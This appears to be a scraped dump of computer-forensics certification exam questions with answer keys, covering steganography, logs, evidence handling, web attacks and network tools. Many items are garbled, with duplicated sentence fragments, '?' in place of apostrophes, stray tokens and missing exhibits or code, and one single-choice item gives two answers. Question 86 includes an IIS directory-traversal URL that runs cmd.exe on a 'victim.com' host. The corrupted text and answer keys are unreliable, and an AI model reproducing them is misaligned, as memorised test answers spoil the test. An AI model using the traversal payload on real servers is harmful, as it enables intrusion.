A. The attacker has conducted a network sweep on port 111 B. The attacker has scanned and exploited the system using Buffer Overflow C. The attacker has used a Trojan on port 32773 D. The attacker has installed a backdoor

Answer: A

QUESTION 42 A computer forensic report is a report which provides detailed information on the complete forensics investigation process. A. True B. False

Answer: A

QUESTION 420 An Expert witness gives an opinion if: A. The Opinion, inferences or conclusions depend on special knowledge, skill or training not within the ordinary experience of lay jurors B. To define the issues of the case for determination by the finder of fact C. To stimulate discussion between the consulting expert and the expert witness D. To deter the witness form expanding the scope of his or her investigation beyond the requirements of the case

Answer: A

QUESTION 422 All Blackberry email is eventually sent and received through what proprietary RIM-operated mechanism? A. Blackberry Message Center B. Microsoft Exchange C. Blackberry WAP gateway D. Blackberry WEP gateway

Answer: A

QUESTION 424 In a virtual test environment, Michael is testing the strength and security of BGP using multiple routers to mimic the backbone of the Internet. This project will help him write his doctoral thesis on "bringing down the Internet". Without sniffing the traffic between the routers, Michael sends millions of RESET packets to the routers in an attempt to shut one or all of them down. After a few hours, one of the routers finally shuts itself down. What will the other routers communicate between themselves? A. The change in the routing fabric to bypass the affected router B. More RESET packets to the affected router to get it to power back up C. STOP packets to all other routers warning of where the attack originated D. RESTART packets to the affected router to get it to power back up

Answer: A

QUESTION 438 You have been called in to help with an investigation of an alleged network intrusion. After the members of the company ITYou have been called in to help with an investigation of an alleged network intrusion. After the members of the company? IT department, you search through the server log files to find any trace of the intrusion. After that you decide to telnet into one of the company routers to see if there is any evidence to be found. While connected to the router, you see some unusual activity and believe that the attackers are currently connected to that router. You start up an ethereal session to begin capturing traffic on the router that could be used in the investigation. At what layer of the OSI model are you monitoring while watching traffic to and from the router? A. Network B. Transport C. Data Link D. Session

Answer: A

QUESTION 44 Computer security logs contain information about the events occurring within an organization's systems and networks. Application and Web server log files are useful in detecting web attacks. The source, nature, and time of the attack can be determined by _________of the compromised system. A. Analyzing log files B. Analyzing SAM file C. Analyzing rainbow tables D. Analyzing hard disk boot records

Answer: A

QUESTION 445 Which federal computer crime law specifically refers to fraud and related activity in connection with access devices like routers? A. 18 U.S.C. 1029 B. 18 U.S.C. 1362 C. 18 U.S.C. 2511 D. 18 U.S.C. 2703

Answer: A

QUESTION 449 Using Internet logging software to investigate a case of malicious use of computers, the investigator comes across some entries that appear odd. From the log, the investigator can see where the person in ;QUESTION went on the Internet. From the log, it appears that the user was manually typing in different user ID numbers. What technique this user was trying? A. Parameter tampering B. Cross site scripting C. SQL injection D. Cookie Poisoning

Answer: A

QUESTION 459 You are the network administrator for a small bank in Dallas, Texas. To ensure network security, you enact a security policy that requires all users to have 14 character passwords. After giving your users 2 weeks notice, you change the Group Policy to force 14 character passwords. A week later you dump the SAM database from the standalone server and run a password-cracking tool against it. Over 99% of the passwords are broken within an hour. Why were these passwords cracked so Quickly? A. Passwords of 14 characters or less are broken up into two 7-character hashes B. A password Group Policy change takes at least 3 weeks to completely replicate throughout a network C. Networks using Active Directory never use SAM databases so the SAM database pulled was empty D. The passwords that were cracked are local accounts on the Domain Controller

Answer: A

QUESTION 463 When is it appropriate to use computer forensics? A. If copyright and intellectual property theft/misuse has occurred B. If employees do not care for their boss?management techniques C. If sales drop off for no apparent reason for an extended period of time D. If a financial institution is burglarized by robbers

Answer: A

QUESTION 63 How do you define forensic computing? A. It is the science of capturing, processing, and investigating data security incidents and making it acceptable to a court of law. B. It is a methodology of guidelines that deals with the process of cyber investigation C. It Is a preliminary and mandatory course necessary to pursue and understand fundamental principles of ethical hacking D. It is the administrative and legal proceeding in the process of forensic investigation

Answer: A

QUESTION 64 Which of the following steganography types hides the secret message in a specifically designed pattern on the document that is unclear to the average reader? A. Open code steganography B. Visual semagrams steganography C. Text semagrams steganography D. Technical steganography

Answer: A

QUESTION 66 During first responder procedure you should follow all laws while collecting the evidence, and contact a computer forensic examiner as soon as possible A. True B. False

Answer: A

QUESTION 67 Buffer Overflow occurs when an application writes more data to a block of memory, or buffer, than the buffer is allocated to hold. Buffer overflow attacks allow an attacker to modify the _______________in order to control the process execution, crash the process and modify internal variables. A. Target process's address space B. Target remote access C. Target rainbow table D. Target SAM file

Answer: A

QUESTION 71 Data Acquisition is the process of imaging or otherwise obtaining information from a digital device and its peripheral equipment and media A. True B. False

Answer: A

QUESTION 72 Under no circumstances should anyone, with the exception of qualified computer forensics personnel, make any attempts to restore or recover information from a computer system or device that holds electronic information. A. True B. False

Answer: A

QUESTION 74 Steganography is a technique of hiding a secret message within an ordinary message and extracting it at the destination to maintain the confidentiality of data. A. True B. False

Answer: A

QUESTION 75 When the operating system marks cluster as used, but does not allocate them to any file, such clusters are known as ___________. A. Lost clusters B. Bad clusters C. Empty clusters D. Unused clusters

Answer: A

QUESTION 78 How do you define Technical Steganography? A. Steganography that uses physical or chemical means to hide the existence of a message B. Steganography that utilizes written natural language to hide the message in the carrier in some non-obvious ways C. Steganography that utilizes written JAVA language to hide the message in the carrier in some non-obvious ways D. Steganography that utilizes visual symbols or signs to hide secret messages

Answer: A

QUESTION 8 Injection flaws are web application vulnerabilities that allow untrusted data to be Interpreted and executed as part of a command or query. Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or corruption, lack of accountability, or denial of access. Which of the following injection flaws involves the injection of malicious code through a web application? A. SQL Injection B. Password brute force C. Nmap Scanning D. Footprinting

Answer: A

QUESTION 88 All the Information about the user activity on the network, like details about login and logoff attempts, is collected in the security log of the computer. When a user's login is successful, successful audits generate an entry whereas unsuccessful audits generate an entry for failed login attempts in the logon event ID table. In the logon event ID table, which event ID entry (number) represents a successful logging on to a computer? A. 528 B. 529 C. 530 D. 531

Answer: A

QUESTION 91 Jason, a renowned forensic investigator, is investigating a network attack that resulted in the compromise of several systems in a reputed multinational's network. He started Wireshark to capture the network traffic. Upon investigation, he found that the DNS packets travelling across the network belonged to a non-company configured IP. Which of the following attack Jason can infer from his findings? A. DNS Poisoning B. Cookie Poisoning Attack C. DNS Redirection D. Session poisoning

Answer: A

QUESTION 92 In what circumstances would you conduct searches without a warrant? A. When destruction of evidence is imminent, a warrantless seizure of that evidence is justified if there is probable cause to believe that the item seized constitutes evidence of criminal activity B. Agents may search a place or object without a warrant if he suspect the crime was committed C. A search warrant is not required if the crime involves Denial-Of-Service attack over the Internet D. Law enforcement agencies located in California under section SB 567 are authorized to seize computers without warrant under all circumstances

Answer: A

QUESTION 95 What is a chain of custody? A. A legal document that demonstrates the progression of evidence as it travels from the original evidence location to the forensic laboratory B. It is a search warrant that is required for seizing evidence at a crime scene C. It Is a document that lists chain of windows process events D. Chain of custody refers to obtaining preemptive court order to restrict further damage of evidence in electronic seizures

Answer: A

QUESTION 96 A steganographic file system is a method to store the files in a way that encrypts and hides the data without the knowledge of others A. True B. False

Answer: A

QUESTION 99 Email archiving is a systematic approach to save and protect the data contained in emails so that it can be accessed fast at a later date. There are two main archive types, namely Local Archive and Server Storage Archive. Which of the following statements is correct while dealing with local archives? A. It is difficult to deal with the webmail as there is no offline archive in most cases. So consult your counsel on the case as to the best way to approach and gain access to the required data on servers B. Local archives do not have evidentiary value as the email client may alter the message data C. Local archives should be stored together with the server storage archives in order to be admissible in a court of law D. Server storage archives are the server information and settings stored on a local system whereas the local archives are the local email client information stored on the mail server

Answer: A

Which of the following commands shows you all of the network services running on Windowsbased servers? A. Net start B. Net use C. Net Session D. Net share

Answer: A

QUESTION 183 A picture file is recovered from a computer under investigation. During the investigation process, the file is enlarged 500% to get a better view of its contents. The picture quality is not degraded at all from this process. What kind of picture is this file?its contents. The picture? quality is not degraded at all from this process. What kind of picture is this file? A. Raster image B. Vector image C. Metafile image D. Catalog image

Answer: B

QUESTION 185 You have been asked to investigate the possibility of computer fraud in the finance department of a company. It is suspected that a staff member has been committing finance fraud by printing cheques that have not been authorized. You have exhaustively searched all data files on a bitmap image of the target computer, but have found no evidence. You suspect the files may not have been saved. What should you examine next in this case? A. The registry B. The swapfile C. The recycle bin D. The metadata

Answer: B

QUESTION 196 Harold is a computer forensics investigator working for a consulting firm out of Atlanta Georgia. Harold is called upon to help with a corporate espionage case in Miami Florida. Harold assists in the investigation by pulling all the data from the computers allegedly used in the illegal activities. He finds that two suspects in the company where stealing sensitive corporate information and selling it to competing companies. From the email and instant messenger logs recovered, Harold has discovered that the two employees notified the buyers by writing symbols on the back of specific stop signs. This way, the buyers knew when and where to meet with the alleged suspects to buy the stolen material. What type of steganography did these two suspects use? A. Text semagram B. Visual semagram C. Grill cipher D. Visual cipher

Answer: B

QUESTION 199 What technique used by Encase makes it virtually impossible to tamper with evidence once it has been acquired? A. Every byte of the file(s) is given an MD5 hash to match against a master file B. Every byte of the file(s) is verified using 32-bit CRC C. Every byte of the file(s) is copied to three different hard drives D. Every byte of the file(s) is encrypted using three different methods

Answer: B

QUESTION 200 You are called in to assist the police in an investigation involving a suspected drug dealer. The police searched the suspect house after aYou are called in to assist the police in an investigation involving a suspected drug dealer. The police searched the suspect? house after a warrant was obtained and they located a floppy disk in the suspect bedroom. The disk contains several files, but they appear to be passwordwarrant was obtained and they located a floppy disk in the suspect? bedroom. The disk contains several files, but they appear to be password protected. What are two common methods used by password cracking software that you could use to obtain the password? A. Limited force and library attack B. Brute force and dictionary attack C. Maximum force and thesaurus attack D. Minimum force and appendix attack

Answer: B

QUESTION 201 What is the slave device connected to the secondary IDE controller on a Linux OS referred to? A. hda B. hdd C. hdb D. hdc

Answer: B

QUESTION 208 When making the preliminary investigations in a sexual harassment case, how many investigators are you recommended having? A. One B. Two C. Three D. Four

Answer: B

QUESTION 214 Which is a standard procedure to perform during all computer forensics investigations? A. With the hard drive in the suspect PC, check the date and time in the system CMOSWith the hard drive in the suspect PC, check the date and time in the system? CMOS B. With the hard drive removed from the suspect PC, check the date and time in the system CMOSWith the hard drive removed from the suspect PC, check the date and time in the system? CMOS C. With the hard drive in the suspect PC, check the date and time in the File Allocation Table D. With the hard drive removed from the suspect PC, check the date and time in the system RAMWith the hard drive removed from the suspect PC, check the date and time in the system? RAM

Answer: B

QUESTION 221 If you are concerned about a high level of compression but not concerned about any possible data loss, what type of compression would you use? A. Lossful compression B. Lossy compression C. Lossless compression D. Time-loss compression

Answer: B

QUESTION 227 John is working on his company policies and guidelines. The section he is currently working on covers company documents; how they shouldJohn is working on his company? policies and guidelines. The section he is currently working on covers company documents; how they should be handled, stored, and eventually destroyed. John is concerned about the process whereby outdated documents are destroyed. What type of shredder should John write in the guidelines to be used when destroying documents? A. Strip-cut shredder B. Cross-cut shredder C. Cross-hatch shredder D. Cris-cross shredder

Answer: B

QUESTION 228 Jacob is a computer forensics investigator with over 10 years experience in investigations and has written over 50 articles on computer forensics. He has been called upon as a qualified witness to testify the accuracy and integrity of the technical log files gathered in an investigation into computer fraud. What is the term used for Jacob testimony in this case?computer fraud. What is the term used for Jacob? testimony in this case? A. Justification B. Authentication C. Reiteration D. Certification

Answer: B

QUESTION 229 At what layer does a cross site scripting attack occur on? A. Presentation B. Application C. Session D. Data Link

Answer: B

QUESTION 234 An investigator is searching through the firewall logs of a company and notices ICMP packets that are larger than 65,536 bytes. What type of activity is the investigator seeing? A. Smurf B. Ping of death C. Fraggle D. Nmap scan

Answer: B

QUESTION 239 An employee is attempting to wipe out data stored on a couple of compact discs (CDs) and digital video discs (DVDs) by using a large magnet. You inform him that this method will not be effective in wiping out the data because CDs and DVDs are _________ media used to store large amounts of data and are not affected by the magnet. A. Magnetic B. Optical C. Anti-Magnetic D. Logical

Answer: B

QUESTION 241 You are using DriveSpy, a forensic tool and want to copy 150 sectors where the starting sector is 1709 on the primary hard drive. Which of the following formats correctly specifies these sectors? A. 0:1000, 150 B. 0:1709, 150 C. 1:1709, 150 D. 0:1709-1858

Answer: B

QUESTION 248 Jack Smith is a forensics investigator who works for Mason Computer Investigation Services. He is investigating a computer that was infected by Ramen Virus. He runs the netstat command on the machine to see its current connections. In the following screenshot, what do the 0.0.0.0 IP addresses signify? A. Those connections are established B. Those connections are in listening mode C. Those connections are in closed/waiting mode D. Those connections are in timed out/waiting mode

Answer: B

QUESTION 25 Digital evidence validation involves using a hashing algorithm utility to create a binary or hexadecimal number that represents the uniqueness of a data set, such as a disk drive or file. Which of the following hash algorithms produces a message digest that is 128 bits long? A. CRC-32 B. MD5 C. SHA-1 D. SHA-512

Answer: B

QUESTION 250 You should make at least how many bit-stream copies of a suspect drive? A. 1 B. 2 C. 3 D. 4

Answer: B

QUESTION 254 What type of flash memory card comes in either Type I or Type II and consumes only five percent of the power required by small hard drives? A. SD memory B. CF memory C. MMC memory D. SM memory

Answer: B

QUESTION 258 A(n) _____________________ is one that's performed by a computer program rather than the attacker manually performing the steps in the attack sequence. A. blackout attack B. automated attack C. distributed attack D. central processing attack

Answer: B

QUESTION 259 Steven has been given the task of designing a computer forensics lab for the company he works for. He has found documentation on all aspects of how to design a lab except the number of exits needed. How many exits should Steven include in his design for the computer forensics lab? A. Three B. One C. Two D. Four

Answer: B

QUESTION 270 When conducting computer forensic analysis, you must guard against ______________ So that you remain focused on the primary job and insure that the level of work does not increase beyond what was originally expected. A. Hard Drive Failure B. Scope Creep C. Unauthorized expenses D. Overzealous marketing

Answer: B

QUESTION 272 Profiling is a forensics technique for analyzing evidence with the goal of identifying the perpetrator from their various activity. After a computer has been compromised by a hacker, which of the following would be most important in forming a profile of the incident? A. The manufacturer of the system compromised B. The logic, formatting and elegance of the code used in the attack C. The nature of the attack D. The vulnerability exploited in the incident

Answer: B

QUESTION 274 In Linux, what is the smallest possible shellcode? A. 8 bytes B. 24 bytes C. 800 bytes D. 80 bytes

Answer: B

QUESTION 283 George is the network administrator of a large Internet company on the west coast. Per corporate policy, none of the employees in the company are allowed to use FTP or SFTP programs without obtaining approval from the IT department. Few managers are using SFTP program on their computers. Before talking to his boss, George wants to have some proof of their activity. George wants to use Ethereal to monitor network traffic, but only SFTP traffic to and from his network. What filter should George use in Ethereal? A. src port 23 and dst port 23 B. src port 22 and dst port 22 C. udp port 22 and host 172.16.28.1/24 D. net port 22

Answer: B

QUESTION 284 You are assisting in the investigation of a possible Web Server hack. The company who called you stated that customers reported to them that whenever they entered the web address of the company in their browser, what they received was a pornographic web site. The company checked the web server and nothing appears wrong. When you type in the IP address of the web site in your browser everything appears normal. What is the name of the attack that affects the DNS cache of the name resolution servers, resulting in those servers directing users to the wrong web site? A. ARP Poisoning B. DNS Poisoning C. HTTP redirect attack D. IP Spoofing

Answer: B

QUESTION 290 Chris has been called upon to investigate a hacking incident reported by one of his clients. The company suspects the involvement of an insider accomplice in the attack. Upon reaching the incident scene, Chris secures the physical area, records the scene using visual media. He shuts the system down by pulling the power plug so that he does not disturb the system in any way. He labels all cables and connectors prior to disconnecting any. What do you think would be the next sequence of events? A. Connect the target media; Prepare the system for acquisition; Secure the evidence; Copy the media B. Prepare the system for acquisition; Connect the target media; Copy the media; Secure the evidence C. Connect the target media; Delete the system for acquisition; Secure the evidence; Copy the media D. Secure the evidence; Prepare the system for acquisition; Connect the target media; Copy the media

Answer: B

QUESTION 300 You are conducting an investigation of fraudulent claims in an insurance company that involves complex text searches through large numbers of documents. Which of the following tools would allow you to quickly and efficiently search for a string within a file on the bitmap image of the target computer? A. Stringsearch B. grep C. dir D. vim

Answer: B

QUESTION 304 While searching through a computer under investigation, you discover numerous files that appear to have had the first letter of the file name replaced by the hex code byte 5h. What does this indicate on the computer? A. The files have been marked as hidden B. The files have been marked for deletion C. The files are corrupt and cannot be recovered D. The files have been marked as read-only

Answer: B

QUESTION 306 How many characters long is the fixed-length MD5 algorithm checksum of a critical system file? A. 16 B. 32 C. 64 D. 48

Answer: B

QUESTION 314 You are carrying out the last round of testing for your new website before it goes live. The website has many dynamic pages and connects to a SQL backend that accesses your product inventory in a database. You come across a web security site that recommends inputting the following code into a search field on web pages to check for vulnerabilities: When you type this and click on search, you receive a pop-up window that says: "This is a test." What is the result of this test? A. Your website is vulnerable to SQL injection B. Your website is vulnerable to CSS C. Your website is vulnerable to web bugs D. Your website is not vulnerable

Answer: B

QUESTION 317 Meyer Electronics Systems just recently had a number of laptops stolen out of their office. On these laptops contained sensitive corporate information regarding patents and company strategies. A month after the laptops were stolen, a competing company was found to have just developed products that almost exactly duplicated products that Meyer produces. What could have prevented this information from being stolen from the laptops? A. DFS Encryption B. EFS Encryption C. SDW Encryption D. IPS Encryption

Answer: B

QUESTION 327 When you are running a vulnerability scan on a network and the IDS cuts off your connection, what type of IDS is being used? A. Passive IDS B. Active IDS C. NIPS D. Progressive IDS

Answer: B

QUESTION 329 What is the first step taken in an investigation for laboratory forensic staff members? A. Packaging the electronic evidence B. Securing and evaluating the electronic crime scene C. Conducting preliminary interviews D. Transporting the electronic evidence

Answer: B

QUESTION 342 Harold is a web designer who has completed a website for ghttech.net. As part of the maintenance agreement he signed with the client, Harold is performing research online and seeing how much exposure the site has received so far. Harold navigates to google.com and types in the following search. link:www.ghttech.net What will this search produce? A. All search engines that link to .net domains B. All sites that link to ghttech.net C. Sites that contain the code: link:www.ghttech.net D. All sites that ghttech.net links to

Answer: B

QUESTION 343 What information do you need to recover when searching a victim computer for a crime committed with specific e-mail message?What information do you need to recover when searching a victim? computer for a crime committed with specific e-mail message? A. Internet service provider information B. E-mail header C. Username and password D. Firewall log

Answer: B

QUESTION 354 While presenting his case to the court, Simon calls many witnesses to the stand to testify. Simon decides to call Hillary Taft, a lay witness, to the stand. Since Hillary is a lay witness, what field would she be considered an expert in? A. Technical material related to forensics B. No particular field C. Judging the character of defendants/victims D. Legal issues

Answer: B

QUESTION 357 Under which Federal Statutes does FBI investigate for computer crimes involving e- mail scams and mail fraud? A. 18 U.S.C. 1029 Possession of Access Devices B. 18 U.S.C. 1030 Fraud and related activity in connection with computers C. 18 U.S.C. 1343 Fraud by wire, radio or television D. 18 U.S.C. 1361 Injury to Government Property E. 18 U.S.C. 1362 Government communication systems F. 18 U.S.C. 1831 Economic Espionage Act G. 18 U.S.C. 1832 Trade Secrets Act

Answer: B

QUESTION 358 Click on the Exhibit Button To test your website for vulnerabilities, you type in a Quotation mark (? for the username field. After you click Ok, you receive the following error message window: What can you infer from this error window? A. SQL injection is not possible B. SQL injection is possible C. The user for line 3306 in the SQL database has a weak password D. The Quotation mark (? is a valid username

Answer: B

QUESTION 360 Paul's company is in the process of undergoing a complete security audit including logical and physical security testing. After all logical tests were performed; it is now time for the physical round to begin. None of the employees are made aware of this round of testing. The securityauditing firm sends in a technician dressed as an electrician. He waits outside in the lobby for some employees to get to work and follows behind them when they access the restricted areas. After entering the main office, he is able to get into the server room telling the IT manager that there is a problem with the outlets in that room. What type of attack has the technician performed? A. Fuzzing B. Tailgating C. Backtrapping D. Man trap attack

Answer: B

QUESTION 361 Your company uses Cisco routers exclusively throughout the network. After securing the routers to the best of your knowledge, an outside security firm is brought in to assess the network security. Although they found very few issues, they were able to enumerate the model, OS version, and capabilities for all your Cisco routers with very little effort. Which feature will you disable to eliminate the ability to enumerate this information on your Cisco routers? A. Simple Network Management Protocol B. Cisco Discovery Protocol C. Border Gateway Protocol D. Broadcast System Protocol

Answer: B

QUESTION 364 You work as a penetration tester for Hammond Security Consultants. You are currently working on a contract for the state government of California. Your next step is to initiate a DoS attack on their network. Why would you want to initiate a DoS attack on a system you are testing? A. Demonstrate that no system can be protected againstDoS attacks B. List weak points on their network C. Show outdatedeQuipment so it can be replaced D. Use attack as a launching point to penetrate deeper into the network

Answer: B

QUESTION 369 Before performing a logical or physical search of a drive in Encase, what must be added to the program? A. File signatures B. Keywords C. Hash sets D. Bookmarks

Answer: B

QUESTION 375 Jason has set up a honeypot environment by creating a DMZ that has no physical or logical access to his production network. In this honeypot, he has placed a server running Windows Active Directory. He has also placed a Web server in the DMZ that services a number of web pages that offer visitors a chance to download sensitive information by clicking on a button. A week later, Jason finds in his network logs how an intruder accessed the honeypot and downloaded sensitive information. Jason uses the logs to try and prosecute the intruder for stealing sensitive corporate information. Why will this not be viable? A. Enticement B. Entrapment C. Intruding into ahoneypot is not illegal D. Intruding into a DMZ is not illegal

Answer: B

QUESTION 382 What will the following command accomplish? C:\> nmap -v -sS -Po 172.16.28.251 - data_length 66000 - packet_trace A. Test the ability of a router to handle under-sized packets B. Test ability of a router to handle over-sized packets C. Test the ability of a WLAN to handle fragmented packets D. Test the ability of a router to handle fragmented packets

Answer: B

QUESTION 383 When reviewing web logs, you see an entry for resource not found in the HTTP status code filed. What is the actual error code that you would see in the log for resource not found? A. 202 B. 404 C. 505 D. 909

Answer: B

QUESTION 393 Jones had been trying to penetrate a remote production system for the past two weeks. This time however, he is able to get into the system. He was able to use the system for a period of three weeks. However law enforcement agencies were recording his every activity and this was later presented as evidence. The organization had used a virtual environment to trap Jones. What is a virtual environment? A. A system using Trojaned commands B. A honeypot that traps hackers C. An environment set up after the user logs in D. An environment set up before an user logs in

Answer: B

QUESTION 400 What should you do when approached by a reporter about a case that you are working on or have worked on? A. Refer the reporter to the attorney that retained you B. Say, o comment?Say, ?o comment C. Answer all the reporter ;QUESTIONs as completely as possibleAnswer all the reporter? ;QUESTIONs as completely as possible D. Answer only the ;QUESTIONs that help your case

Answer: B

QUESTION 416 What is the following command trying to accomplish? C:\> nmap -sU -p445 192.168.0.0/24 A. Verify that TCP port 445 is open for the 192.168.0.0 network B. Verify that UDP port 445 is open for the 192.168.0.0 network C. Verify that UDP port 445 is closed for the 192.168.0.0 network D. Verify that NETBIOS is running for the 192.168.0.0 network

Answer: B

QUESTION 419 Tyler is setting up a wireless network for his business that he runs out of his home. He has followed all the directions from the ISP as well as the wireless router manual. He does not have any encryption set and the SSID is being broadcast. On his laptop, he can pick up the wireless signal for short periods of time, but then the connection drops and the signal goes away. Eventually the wireless signal shows back up, but drops intermittently. What could be Tyler issue with his home wireless network? A. CB radio B. 2.4Ghz Cordless phones C. Satellite television D. Computers on his wired network

Answer: B

QUESTION 423 At what layer of the OSI model do routers function on? A. 4 B. 3 C. 1 D. 5

Answer: B

QUESTION 426 George is performing security analysis for Hammond and Sons LLC. He is testing security vulnerabilities of their wireless network. He plans on remaining as "stealthy" as possible during the scan. Why would a scanner like Nessus is not recommended in this situation? A. Nessus cannot perform wireless testing B. Nessus is too loud C. There are no ways of performing a "stealthy" wireless scan D. Nessus is not a network scanner

Answer: B

QUESTION 427 One technique for hiding information is to change the file extension from the correct one to one that might not be noticed by an investigator. For example, changing a .jpg extension to a .doc extension so that a picture file appears to be a document. What can an investigator examine to verify that a file has the correct extension? A. the File Allocation Table B. the file header C. the file footer D. the sector map

Answer: B

QUESTION 428 Larry is an IT consultant who works for corporations and government agencies. Larry plans on shutting down the city's network using BGP devices and zombies? What type of Penetration Testing is Larry planning to carry out? A. Router Penetration Testing B. DoS Penetration Testing C. Internal Penetration Testing D. Firewall Penetration Testing

Answer: B

QUESTION 429 ____________________ is simply the application of Computer Investigation and analysis techniques in the interests of determining potential legal evidence. A. Network Forensics B. Computer Forensics C. Incident Response D. Event Reaction

Answer: B

QUESTION 432 When reviewing web logs, you see an entry for esource not found?in the HTTP status code field. What is the actual error code that you wouldWhen reviewing web logs, you see an entry for ?esource not found?in the HTTP status code field. What is the actual error code that you would see in the log for esource not found?see in the log for ?esource not found? A. 202 B. 404 C. 606 D. 999

Answer: B

QUESTION 433 What encryption technology is used on Blackberry devices?Password Keeper? A. 3DES B. AES C. Blowfish D. RC5

Answer: B

QUESTION 435 Which program is the oot loader?when Windows XP starts up?Which program is the ?oot loader?when Windows XP starts up? A. KERNEL.EXE B. NTLDR C. LOADER D. LILO

Answer: B

QUESTION 436 Corporate investigations are typically easier than public investigations because: A. the users have standard corporate equipment and software B. the investigator does not have to get a warrant C. the investigator has to get a warrant D. the users can load whatever they want on their machines

Answer: B

QUESTION 456 Your company's network just finished going through a SAS 70 audit. This audit reported that overall, your network is secure, but there are some areas that needs improvement. The major area was SNMP security. The audit company recommended turning off SNMP, but that is not an option since you have so many remote nodes to keep track of. What step could you take to help secure SNMP on your network? A. Block access to TCP port 171 B. Change the default community string names C. Block all internal MAC address from using SNMP D. Block access to UDP port 171

Answer: B

QUESTION 478 SIM is a removable component that contains essential information about the subscriber. It has both volatile and non-volatile memory. The file system of a SIM resides in _____________ memory. A. Volatile B. Non-volatile

Answer: B

QUESTION 485 Event correlation is a procedure that is assigned with a new meaning for a set of events that occur in a predefined interval of time. Which type of correlation will you use if your organization wants to use different OS and network hardware platforms throughout the network? A. Same-platform correlation B. Cross-platform correlation C. Multiple-platform correlation D. Network-platform correlation

Answer: B

QUESTION 54 Which of the following commands shows you the names of all open shared files on a server and number of file locks on each file? A. Net sessions B. Net file C. Netconfig D. Net share

Answer: B

QUESTION 57 When NTFS Is formatted, the format program assigns the __________ sectors to the boot sectors and to the bootstrap code A. First 12 B. First 16 C. First 22 D. First 24

Answer: B

QUESTION 61 Which of the following reports are delivered under oath to a board of directors/managers/panel of jury? A. Written informal Report B. Verbal Formal Report C. Written Formal Report D. Verbal Informal Report

Answer: B

QUESTION 86 The Apache server saves diagnostic information and error messages that it encounters while processing requests. The default path of this file is usr/local/apache/logs/error.log in Linux. Identify the Apache error log from the following logs. A. 127.0.0.1 - frank [10/Oct/2000:13:55:36-0700] "GET /apache_pb.grf HTTP/1.0" 200 B. [Wed Oct 11 14:32:52 2000] [error] [client 127.0.0.1] client denied by server configuration: /export/home/live/ap/htdocs/test C. http://victim.com/scripts/..%c0%af./..%c0%af./..%c0%af./..%c0%af./..%c0%af./..%c0%af./..%c0% af./..%c0%af./../winnt/system32/cmd.exe?/c+dir+c:\wintt\system32\Logfiles\W3SVC1 D. 127.0.0.1 --[10/Apr/2007:10:39:11 +0300] ] [error] "GET /apache_pb.gif HTTP/1.0' 200

Answer: B

QUESTION 87 A mobile operating system is the operating system that operates a mobile device like a mobile phone, smartphone, PDA, etc. It determines the functions and features available on mobile devices such as keyboards, applications, email, text messaging, etc. Which of the following mobile operating systems is free and open source? A. Web OS B. Android C. Apple IOS D. Symbian OS

Answer: B

QUESTION 89 P0P3 (Post Office Protocol 3) is a standard protocol for receiving email that deletes mail on the server as soon as the user downloads it. When a message arrives, the POP3 server appends it to the bottom of the recipient's account file, which can be retrieved by the email client at any preferred time. Email client connects to the POP3 server at _______________by default to fetch emails. A. Port 109 B. Port 110 C. Port 115 D. Port 123

Answer: B

QUESTION 90 JPEG is a commonly used method of compressing photographic Images. It uses a compression algorithm to minimize the size of the natural image, without affecting the quality of the image. The JPEG lossy algorithm divides the image in separate blocks of____________. A. 4x4 pixels B. 8x8 pixels C. 16x16 pixels D. 32x32 pixels

Answer: B

QUESTION 98 Wi-Fi Protected Access (WPA) is a data encryption method for WLANs based on 802.11 standards. Temporal Key Integrity Protocol (TKIP) enhances WEP by adding a rekeying mechanism to provide fresh encryption and integrity keys. Temporal keys are changed for every____________. A. 5,000 packets B. 10.000 packets C. 15,000 packets D. 20.000 packets

Answer: B

QUESTION 381 Which of the following filesystem is used by Mac OS X? A. EFS B. HFS+ C. EXT2 D. NFS

Answer: B Explanation: EFS (Encrypting File System) is part of NTFS and used on Windows EXT2 is used on Linux NFS (Network File System) is for access to a network file system over TCP/IP

QUESTION 293 James is testing the ability of his routers to withstand DoS attacks. James sends ICMP ECHO requests to the broadcast address of his network. What type of DoS attack is James testing against his network? A. Fraggle B. Smurf C. SYN flood D. Trinoo

Answer: B Explanation: The Fraggle attack is like a smurf attack, but uses UDP packets and not ICMP.

QUESTION 243 When examining the log files from a Windows IIS Web Server, how often is a new log file created? A. the same log is used at all times B. a new log file is created everyday C. a new log file is created each week D. a new log is created each time the Web Server is started

Answer: B Explanation: Wecannot tell if the ;QUESTION is referring to the httperr.log file (IIS 6.0) or is it referring to the logfiles for the website. If IIS is the case, "a new log file is created every day" should be the correct Answer. Microsoft creates the log files in the following format: exYYMMdd.log format and rotates them daily.

QUESTION 282 Which Intrusion Detection System (IDS) usually produces the most false alarms due to the unpredictable behaviors of users and networks? A. network-based IDS systems (NIDS) B. host-based IDS systems (HIDS) C. anomaly detection D. signature recognition

Answer: BC Explanation: NIDS and HIDS are types of IDS systems, Host or Network, and addresses placement of the probe. Anomaly detection is based on behavior analysis, and if you read the question the question says "behavior" and if the behavior is unporedictable, then the IDS won't know what is normal and what is bad.

QUESTION 120 Identify the attack from following sequence of actions? Step 1: A user logs in to a trusted site and creates a new session Step 2: The trusted site stores a session identifier for the session in a cookie in the web browser Step 3: The user is tricked to visit a malicious site Step 4: the malicious site sends a request from the user's browser using his session cookie A. Web Application Denial-of-Service (DoS) Attack B. Cross-Site Scripting (XSS) Attacks C. Cross-Site Request Forgery (CSRF) Attack D. Hidden Field Manipulation Attack

Answer: C

QUESTION 139 Which of the following attacks allows an attacker to access restricted directories, including application source code, configuration and critical system files, and to execute commands outside of the web server's root directory? A. Unvalidated input B. Parameter/form tampering C. Directory traversal D. Security misconfiguration

Answer: C

QUESTION 171 When investigating a network that uses DHCP to assign IP addresses, where would you look to determine which system (MAC address) had a specific IP address at a specific time? A. On the individual computer ARP cache B. In the Web Server log files C. In the DHCP Server log files D. There is no way to determine the specific IP address

Answer: C

QUESTION 174 To check for POP3 traffic using Ethereal, what port should an investigator search by? A. 143 B. 25 C. 110 D. 125

Answer: C

QUESTION 184 What layer of the OSI model do TCP and UDP utilize? A. Data Link B. Network C. Transport D. Session

Answer: C

QUESTION 19 Subscriber Identity Module (SIM) is a removable component that contains essential information about the subscriber. Its main function entails authenticating the user of the cell phone to the network to gain access to subscribed services. SIM contains a 20-digit long Integrated Circuit Card identification (ICCID) number, identify the issuer identifier Number from the ICCID below. A. 89 B. 44 C. 245252 D. 001451548

Answer: C

QUESTION 198 What is the smallest physical storage unit on a hard drive? A. Track B. Cluster C. Sector D. Platter

Answer: C

